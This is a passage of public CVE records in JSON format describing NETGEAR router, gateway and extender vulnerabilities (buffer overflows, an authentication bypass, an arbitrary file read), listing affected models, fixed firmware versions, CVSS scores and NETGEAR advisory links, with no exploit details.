"vectorString": "CVSS:3.0/AC:L/AV:A/A:H/C:H/I:H/PR:H/S:U/UI:N",
"version": "3.0"
}
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://kb.netgear.com/000060627/Security-Advisory-for-Post-Authentication-Stack-Overflow-on-Some-Routers-Modem-Routers-Extenders-and-Orbi-Satellites-PSV-2018-0053",
"refsource": "CONFIRM",
"url": "https://kb.netgear.com/000060627/Security-Advisory-for-Post-Authentication-Stack-Overflow-on-Some-Routers-Modem-Routers-Extenders-and-Orbi-Satellites-PSV-2018-0053"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2019-20755",
"datePublished": "2020-04-16T21:08:03",
"dateReserved": "2020-04-15T00:00:00",
"dateUpdated": "2024-08-05T02:53:09.159Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
cve-2019-20692
Vulnerability from cvelistv5
Published
2020-04-16 14:28
Modified
2024-08-05 02:46
Severity ?
EPSS score ?
Summary
Certain NETGEAR devices are affected by a stack-based buffer overflow by an unauthenticated attacker. This affects D6220 before 1.0.0.44, D6400 before 1.0.0.78, D7000v2 before 1.0.0.51, D8500 before 1.0.3.42, DGN2200v4 before 1.0.0.110, DGND2200Bv4 before 1.0.0.109, EX3700 before 1.0.0.70, EX3800 before 1.0.0.70, EX6000 before 1.0.0.30, EX6100 before 1.0.2.24, EX6120 before 1.0.0.40, EX6130 before 1.0.0.22, EX6150v1 before 1.0.0.42, EX6200 before 1.0.3.88, EX7000 before 1.0.0.66, R6250 before 1.0.4.26, R6300v2 before 1.0.4.28, R6400 before 1.0.1.36, R6400v2 before 1.0.2.52, R6700 before 1.0.1.46, R6900 before 1.0.1.46, R7000 before 1.0.9.28, R6900P before 1.3.1.44, R7000P before 1.3.1.44, R7100LG before 1.0.0.46, R7300DST before 1.0.0.68, R7900 before 1.0.2.10, R8000 before 1.0.4.12, R7900P before 1.3.0.10, R8000P before 1.3.0.10, R8300 before 1.0.2.122, R8500 before 1.0.2.122, WN2500RPv2 before 1.0.1.54, WNDR3400v3 before 1.0.1.22, and WNR3500Lv2 before 1.2.0.54.
References
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-05T02:46:10.452Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://kb.netgear.com/000061447/Security-Advisory-for-Pre-Authentication-Stack-Overflow-on-Some-Routers-Gateways-and-Extenders-PSV-2017-2014"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Certain NETGEAR devices are affected by a stack-based buffer overflow by an unauthenticated attacker. This affects D6220 before 1.0.0.44, D6400 before 1.0.0.78, D7000v2 before 1.0.0.51, D8500 before 1.0.3.42, DGN2200v4 before 1.0.0.110, DGND2200Bv4 before 1.0.0.109, EX3700 before 1.0.0.70, EX3800 before 1.0.0.70, EX6000 before 1.0.0.30, EX6100 before 1.0.2.24, EX6120 before 1.0.0.40, EX6130 before 1.0.0.22, EX6150v1 before 1.0.0.42, EX6200 before 1.0.3.88, EX7000 before 1.0.0.66, R6250 before 1.0.4.26, R6300v2 before 1.0.4.28, R6400 before 1.0.1.36, R6400v2 before 1.0.2.52, R6700 before 1.0.1.46, R6900 before 1.0.1.46, R7000 before 1.0.9.28, R6900P before 1.3.1.44, R7000P before 1.3.1.44, R7100LG before 1.0.0.46, R7300DST before 1.0.0.68, R7900 before 1.0.2.10, R8000 before 1.0.4.12, R7900P before 1.3.0.10, R8000P before 1.3.0.10, R8300 before 1.0.2.122, R8500 before 1.0.2.122, WN2500RPv2 before 1.0.1.54, WNDR3400v3 before 1.0.1.22, and WNR3500Lv2 before 1.2.0.54."
}
],
"metrics": [
{
"cvssV3_0": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "LOW",
"baseScore": 6.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AC:L/AV:L/A:L/C:H/I:H/PR:H/S:U/UI:N",
"version": "3.0"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2020-04-16T14:28:15",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://kb.netgear.com/000061447/Security-Advisory-for-Pre-Authentication-Stack-Overflow-on-Some-Routers-Gateways-and-Extenders-PSV-2017-2014"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2019-20692",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Certain NETGEAR devices are affected by a stack-based buffer overflow by an unauthenticated attacker. This affects D6220 before 1.0.0.44, D6400 before 1.0.0.78, D7000v2 before 1.0.0.51, D8500 before 1.0.3.42, DGN2200v4 before 1.0.0.110, DGND2200Bv4 before 1.0.0.109, EX3700 before 1.0.0.70, EX3800 before 1.0.0.70, EX6000 before 1.0.0.30, EX6100 before 1.0.2.24, EX6120 before 1.0.0.40, EX6130 before 1.0.0.22, EX6150v1 before 1.0.0.42, EX6200 before 1.0.3.88, EX7000 before 1.0.0.66, R6250 before 1.0.4.26, R6300v2 before 1.0.4.28, R6400 before 1.0.1.36, R6400v2 before 1.0.2.52, R6700 before 1.0.1.46, R6900 before 1.0.1.46, R7000 before 1.0.9.28, R6900P before 1.3.1.44, R7000P before 1.3.1.44, R7100LG before 1.0.0.46, R7300DST before 1.0.0.68, R7900 before 1.0.2.10, R8000 before 1.0.4.12, R7900P before 1.3.0.10, R8000P before 1.3.0.10, R8300 before 1.0.2.122, R8500 before 1.0.2.122, WN2500RPv2 before 1.0.1.54, WNDR3400v3 before 1.0.1.22, and WNR3500Lv2 before 1.2.0.54."
}
]
},
"impact": {
"cvss": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "LOW",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AC:L/AV:L/A:L/C:H/I:H/PR:H/S:U/UI:N",
"version": "3.0"
}
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://kb.netgear.com/000061447/Security-Advisory-for-Pre-Authentication-Stack-Overflow-on-Some-Routers-Gateways-and-Extenders-PSV-2017-2014",
"refsource": "CONFIRM",
"url": "https://kb.netgear.com/000061447/Security-Advisory-for-Pre-Authentication-Stack-Overflow-on-Some-Routers-Gateways-and-Extenders-PSV-2017-2014"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2019-20692",
"datePublished": "2020-04-16T14:28:15",
"dateReserved": "2020-04-15T00:00:00",
"dateUpdated": "2024-08-05T02:46:10.452Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
cve-2018-21156
Vulnerability from cvelistv5
Published
2020-04-27 17:14
Modified
2024-08-05 12:26
Severity ?
EPSS score ?
Summary
Certain NETGEAR devices are affected by a buffer overflow by an authenticated user. This affects D6220 before 1.0.0.38, D6400 before 1.0.0.74, D7000v2 before 1.0.0.74, D8500 before 1.0.3.39, DGN2200v4 before 1.0.0.102, DGN2200Bv4 before 1.0.0.102, EX3700 before 1.0.0.70, EX3800 before 1.0.0.70, EX6000 before 1.0.0.30, EX6100 before 1.0.2.22, EX6120 before 1.0.0.40, EX6130 before 1.0.0.22, EX6150 before 1.0.0.38, EX6200 before 1.0.3.86, EX7000 before 1.0.0.64, R6250 before 1.0.4.20, R6300v2 before 1.0.4.22, R6400 before 1.0.1.32, R6400v2 before 1.0.2.52, R6700 before 1.0.1.44, R6900 before 1.0.1.44, R6900P before 1.3.0.18, R7000 before 1.0.9.28, R7000P before 1.3.0.18, R7300DST before 1.0.0.62, R7900 before 1.0.2.10, R7900P before 1.3.0.10, R8000 before 1.0.4.12, R8000P before 1.3.0.10, R8300 before 1.0.2.116, R8500 before 1.0.2.116, WN2500RPv2 before 1.0.1.52, WNDR3400v3 before 1.0.1.18, and WNR3500Lv2 before 1.2.0.46.
References
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-05T12:26:38.299Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://kb.netgear.com/000059474/Security-Advisory-for-Post-Authentication-Buffer-Overflow-on-Some-Gateways-Routers-and-Extenders-PSV-2017-2460"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Certain NETGEAR devices are affected by a buffer overflow by an authenticated user. This affects D6220 before 1.0.0.38, D6400 before 1.0.0.74, D7000v2 before 1.0.0.74, D8500 before 1.0.3.39, DGN2200v4 before 1.0.0.102, DGN2200Bv4 before 1.0.0.102, EX3700 before 1.0.0.70, EX3800 before 1.0.0.70, EX6000 before 1.0.0.30, EX6100 before 1.0.2.22, EX6120 before 1.0.0.40, EX6130 before 1.0.0.22, EX6150 before 1.0.0.38, EX6200 before 1.0.3.86, EX7000 before 1.0.0.64, R6250 before 1.0.4.20, R6300v2 before 1.0.4.22, R6400 before 1.0.1.32, R6400v2 before 1.0.2.52, R6700 before 1.0.1.44, R6900 before 1.0.1.44, R6900P before 1.3.0.18, R7000 before 1.0.9.28, R7000P before 1.3.0.18, R7300DST before 1.0.0.62, R7900 before 1.0.2.10, R7900P before 1.3.0.10, R8000 before 1.0.4.12, R8000P before 1.3.0.10, R8300 before 1.0.2.116, R8500 before 1.0.2.116, WN2500RPv2 before 1.0.1.52, WNDR3400v3 before 1.0.1.18, and WNR3500Lv2 before 1.2.0.46."
}
],
"metrics": [
{
"cvssV3_0": {
"attackComplexity": "LOW",
"attackVector": "ADJACENT_NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 6.8,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AC:L/AV:A/A:H/C:H/I:H/PR:H/S:U/UI:N",
"version": "3.0"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2020-04-27T17:14:33",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://kb.netgear.com/000059474/Security-Advisory-for-Post-Authentication-Buffer-Overflow-on-Some-Gateways-Routers-and-Extenders-PSV-2017-2460"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2018-21156",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Certain NETGEAR devices are affected by a buffer overflow by an authenticated user. This affects D6220 before 1.0.0.38, D6400 before 1.0.0.74, D7000v2 before 1.0.0.74, D8500 before 1.0.3.39, DGN2200v4 before 1.0.0.102, DGN2200Bv4 before 1.0.0.102, EX3700 before 1.0.0.70, EX3800 before 1.0.0.70, EX6000 before 1.0.0.30, EX6100 before 1.0.2.22, EX6120 before 1.0.0.40, EX6130 before 1.0.0.22, EX6150 before 1.0.0.38, EX6200 before 1.0.3.86, EX7000 before 1.0.0.64, R6250 before 1.0.4.20, R6300v2 before 1.0.4.22, R6400 before 1.0.1.32, R6400v2 before 1.0.2.52, R6700 before 1.0.1.44, R6900 before 1.0.1.44, R6900P before 1.3.0.18, R7000 before 1.0.9.28, R7000P before 1.3.0.18, R7300DST before 1.0.0.62, R7900 before 1.0.2.10, R7900P before 1.3.0.10, R8000 before 1.0.4.12, R8000P before 1.3.0.10, R8300 before 1.0.2.116, R8500 before 1.0.2.116, WN2500RPv2 before 1.0.1.52, WNDR3400v3 before 1.0.1.18, and WNR3500Lv2 before 1.2.0.46."
}
]
},
"impact": {
"cvss": {
"attackComplexity": "LOW",
"attackVector": "ADJACENT",
"availabilityImpact": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AC:L/AV:A/A:H/C:H/I:H/PR:H/S:U/UI:N",
"version": "3.0"
}
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://kb.netgear.com/000059474/Security-Advisory-for-Post-Authentication-Buffer-Overflow-on-Some-Gateways-Routers-and-Extenders-PSV-2017-2460",
"refsource": "CONFIRM",
"url": "https://kb.netgear.com/000059474/Security-Advisory-for-Post-Authentication-Buffer-Overflow-on-Some-Gateways-Routers-and-Extenders-PSV-2017-2460"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2018-21156",
"datePublished": "2020-04-27T17:14:33",
"dateReserved": "2020-04-20T00:00:00",
"dateUpdated": "2024-08-05T12:26:38.299Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
cve-2019-20734
Vulnerability from cvelistv5
Published
2020-04-16 19:12
Modified
2024-08-05 02:53
Severity ?
EPSS score ?
Summary
Certain NETGEAR devices are affected by a buffer overflow by an unauthenticated attacker. This affects D6220 before 1.0.0.40, D8500 before 1.0.3.39, EX3700 before 1.0.0.70, EX3800 before 1.0.0.70, EX6000 before 1.0.0.30, EX6100 before 1.0.2.22, EX6120 before 1.0.0.40, EX6130 before 1.0.0.22, EX6150v1 before 1.0.0.42, EX6200 before 1.0.3.88, EX7000 before 1.0.0.66, R6300v2 before 1.0.4.18, R6400 before 1.0.1.24, R6400v2 before 1.0.2.32, R6700 before 1.0.1.22, R6700v3 before 1.0.2.32, R6900 before 1.0.1.22, R7000 before 1.0.9.6, R6900P before 1.0.0.56, R7000P before 1.0.0.56, R7100LG before 1.0.0.42, R7300DST before 1.0.0.54, R7900 before 1.0.1.26, R8300 before 1.0.2.106, R8500 before 1.0.2.106, WN2500RPv2 before 1.0.1.54, and WNR3500Lv2 before 1.2.0.46. NOTE: this may be a result of an incomplete fix for CVE-2017-18864.
References
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-05T02:53:08.707Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://kb.netgear.com/000061192/Security-Advisory-for-Pre-Authentication-Buffer-Overflow-on-Some-Routers-Gateways-and-Extenders-PSV-2017-0791"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Certain NETGEAR devices are affected by a buffer overflow by an unauthenticated attacker. This affects D6220 before 1.0.0.40, D8500 before 1.0.3.39, EX3700 before 1.0.0.70, EX3800 before 1.0.0.70, EX6000 before 1.0.0.30, EX6100 before 1.0.2.22, EX6120 before 1.0.0.40, EX6130 before 1.0.0.22, EX6150v1 before 1.0.0.42, EX6200 before 1.0.3.88, EX7000 before 1.0.0.66, R6300v2 before 1.0.4.18, R6400 before 1.0.1.24, R6400v2 before 1.0.2.32, R6700 before 1.0.1.22, R6700v3 before 1.0.2.32, R6900 before 1.0.1.22, R7000 before 1.0.9.6, R6900P before 1.0.0.56, R7000P before 1.0.0.56, R7100LG before 1.0.0.42, R7300DST before 1.0.0.54, R7900 before 1.0.1.26, R8300 before 1.0.2.106, R8500 before 1.0.2.106, WN2500RPv2 before 1.0.1.54, and WNR3500Lv2 before 1.2.0.46. NOTE: this may be a result of an incomplete fix for CVE-2017-18864."
}
],
"metrics": [
{
"cvssV3_0": {
"attackComplexity": "HIGH",
"attackVector": "ADJACENT_NETWORK",
"availabilityImpact": "LOW",
"baseScore": 8.2,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AC:H/AV:A/A:L/C:H/I:H/PR:N/S:C/UI:N",
"version": "3.0"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2020-05-05T22:24:25",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://kb.netgear.com/000061192/Security-Advisory-for-Pre-Authentication-Buffer-Overflow-on-Some-Routers-Gateways-and-Extenders-PSV-2017-0791"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2019-20734",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Certain NETGEAR devices are affected by a buffer overflow by an unauthenticated attacker. This affects D6220 before 1.0.0.40, D8500 before 1.0.3.39, EX3700 before 1.0.0.70, EX3800 before 1.0.0.70, EX6000 before 1.0.0.30, EX6100 before 1.0.2.22, EX6120 before 1.0.0.40, EX6130 before 1.0.0.22, EX6150v1 before 1.0.0.42, EX6200 before 1.0.3.88, EX7000 before 1.0.0.66, R6300v2 before 1.0.4.18, R6400 before 1.0.1.24, R6400v2 before 1.0.2.32, R6700 before 1.0.1.22, R6700v3 before 1.0.2.32, R6900 before 1.0.1.22, R7000 before 1.0.9.6, R6900P before 1.0.0.56, R7000P before 1.0.0.56, R7100LG before 1.0.0.42, R7300DST before 1.0.0.54, R7900 before 1.0.1.26, R8300 before 1.0.2.106, R8500 before 1.0.2.106, WN2500RPv2 before 1.0.1.54, and WNR3500Lv2 before 1.2.0.46. NOTE: this may be a result of an incomplete fix for CVE-2017-18864."
}
]
},
"impact": {
"cvss": {
"attackComplexity": "HIGH",
"attackVector": "ADJACENT",
"availabilityImpact": "LOW",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AC:H/AV:A/A:L/C:H/I:H/PR:N/S:C/UI:N",
"version": "3.0"
}
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://kb.netgear.com/000061192/Security-Advisory-for-Pre-Authentication-Buffer-Overflow-on-Some-Routers-Gateways-and-Extenders-PSV-2017-0791",
"refsource": "CONFIRM",
"url": "https://kb.netgear.com/000061192/Security-Advisory-for-Pre-Authentication-Buffer-Overflow-on-Some-Routers-Gateways-and-Extenders-PSV-2017-0791"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2019-20734",
"datePublished": "2020-04-16T19:12:41",
"dateReserved": "2020-04-15T00:00:00",
"dateUpdated": "2024-08-05T02:53:08.707Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
cve-2017-18732
Vulnerability from cvelistv5
Published
2020-04-23 16:23
Modified
2024-08-05 21:37
Severity ?
EPSS score ?
Summary
Certain NETGEAR devices are affected by authentication bypass. This affects R6300v2 before 1.0.4.8, PLW1000v2 before 1.0.0.14, and PLW1010v2 before 1.0.0.14.
References
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-05T21:37:42.876Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://kb.netgear.com/000051523/Security-Advisory-for-Authentication-Bypass-on-R6300v2-PLW1000v2-and-PLW1010v2-PSV-2016-0069"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Certain NETGEAR devices are affected by authentication bypass. This affects R6300v2 before 1.0.4.8, PLW1000v2 before 1.0.0.14, and PLW1010v2 before 1.0.0.14."
}
],
"metrics": [
{
"cvssV3_0": {
"attackComplexity": "LOW",
"attackVector": "ADJACENT_NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AC:L/AV:A/A:H/C:H/I:H/PR:N/S:U/UI:N",
"version": "3.0"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2020-04-23T16:23:08",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://kb.netgear.com/000051523/Security-Advisory-for-Authentication-Bypass-on-R6300v2-PLW1000v2-and-PLW1010v2-PSV-2016-0069"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2017-18732",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Certain NETGEAR devices are affected by authentication bypass. This affects R6300v2 before 1.0.4.8, PLW1000v2 before 1.0.0.14, and PLW1010v2 before 1.0.0.14."
}
]
},
"impact": {
"cvss": {
"attackComplexity": "LOW",
"attackVector": "ADJACENT",
"availabilityImpact": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AC:L/AV:A/A:H/C:H/I:H/PR:N/S:U/UI:N",
"version": "3.0"
}
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://kb.netgear.com/000051523/Security-Advisory-for-Authentication-Bypass-on-R6300v2-PLW1000v2-and-PLW1010v2-PSV-2016-0069",
"refsource": "CONFIRM",
"url": "https://kb.netgear.com/000051523/Security-Advisory-for-Authentication-Bypass-on-R6300v2-PLW1000v2-and-PLW1010v2-PSV-2016-0069"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2017-18732",
"datePublished": "2020-04-23T16:23:08",
"dateReserved": "2020-04-20T00:00:00",
"dateUpdated": "2024-08-05T21:37:42.876Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
cve-2017-18769
Vulnerability from cvelistv5
Published
2020-04-22 14:54
Modified
2024-08-05 21:37
Severity ?
EPSS score ?
Summary
Certain NETGEAR devices are affected by an attacker's ability to read arbitrary files. This affects D6220 before 1.0.0.40, D6400 before 1.0.0.74, D7000 before 1.0.1.60, D7800 before 1.0.1.34, D8500 before 1.0.3.39, DGN2200v4 before 1.0.0.94, DGN2200Bv4 before 1.0.0.94, EX6200v2 before 1.0.1.50, EX7000 before 1.0.0.56, JR6150 before 1.0.1.18, R6050 before 1.0.1.10J, R6100 before 1.0.1.16, R6150 before 1.0.1.10, R6220 before 1.1.0.50, R6250 before 1.0.4.12, R6300v2 before 1.0.4.12, R6400 before 1.0.1.24, R6400v2 before 1.0.2.32, R6700 before 1.0.1.26, R6700v2 before 1.2.0.4, R6800 before 1.0.1.10, R6900 before 1.0.1.26, R6900P before 1.0.0.58, R6900v2 before 1.2.0.4, R7000 before 1.0.9.6, R7000P before 1.0.0.58, R7100LG before 1.0.0.32, R7300 before 1.0.0.54, R7500 before 1.0.0.112, R7500v2 before 1.0.3.20, R7800 before 1.0.2.36, R7900 before 1.0.1.18, R8000 before 1.0.3.48, R8300 before 1.0.2.104, R8500 before 1.0.2.104, R9000 before 1.0.2.40, WNDR3400v3 before 1.0.1.14, WNDR3700v4 before 1.0.2.96, WNDR4300v1 before 1.0.2.98, WNDR4300v2 before 1.0.0.48, WNDR4500v3 before 1.0.0.48, and WNR3500Lv2 before 1.2.0.44.
References
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-05T21:37:44.224Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://kb.netgear.com/000051474/Security-Advisory-for-Arbitrary-File-Read-on-Some-Routers-Gateways-and-Extenders-PSV-2016-0122"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Certain NETGEAR devices are affected by an attacker\u0027s ability to read arbitrary files. This affects D6220 before 1.0.0.40, D6400 before 1.0.0.74, D7000 before 1.0.1.60, D7800 before 1.0.1.34, D8500 before 1.0.3.39, DGN2200v4 before 1.0.0.94, DGN2200Bv4 before 1.0.0.94, EX6200v2 before 1.0.1.50, EX7000 before 1.0.0.56, JR6150 before 1.0.1.18, R6050 before 1.0.1.10J, R6100 before 1.0.1.16, R6150 before 1.0.1.10, R6220 before 1.1.0.50, R6250 before 1.0.4.12, R6300v2 before 1.0.4.12, R6400 before 1.0.1.24, R6400v2 before 1.0.2.32, R6700 before 1.0.1.26, R6700v2 before 1.2.0.4, R6800 before 1.0.1.10, R6900 before 1.0.1.26, R6900P before 1.0.0.58, R6900v2 before 1.2.0.4, R7000 before 1.0.9.6, R7000P before 1.0.0.58, R7100LG before 1.0.0.32, R7300 before 1.0.0.54, R7500 before 1.0.0.112, R7500v2 before 1.0.3.20, R7800 before 1.0.2.36, R7900 before 1.0.1.18, R8000 before 1.0.3.48, R8300 before 1.0.2.104, R8500 before 1.0.2.104, R9000 before 1.0.2.40, WNDR3400v3 before 1.0.1.14, WNDR3700v4 before 1.0.2.96, WNDR4300v1 before 1.0.2.98, WNDR4300v2 before 1.0.0.48, WNDR4500v3 before 1.0.0.48, and WNR3500Lv2 before 1.2.0.44."
}
],
"metrics": [
{
"cvssV3_0": {
"attackComplexity": "LOW",
"attackVector": "PHYSICAL",
"availabilityImpact": "NONE",
"baseScore": 4.6,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AC:L/AV:P/A:N/C:H/I:N/PR:N/S:U/UI:N",
"version": "3.0"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2020-04-22T14:54:48",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://kb.netgear.com/000051474/Security-Advisory-for-Arbitrary-File-Read-on-Some-Routers-Gateways-and-Extenders-PSV-2016-0122"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
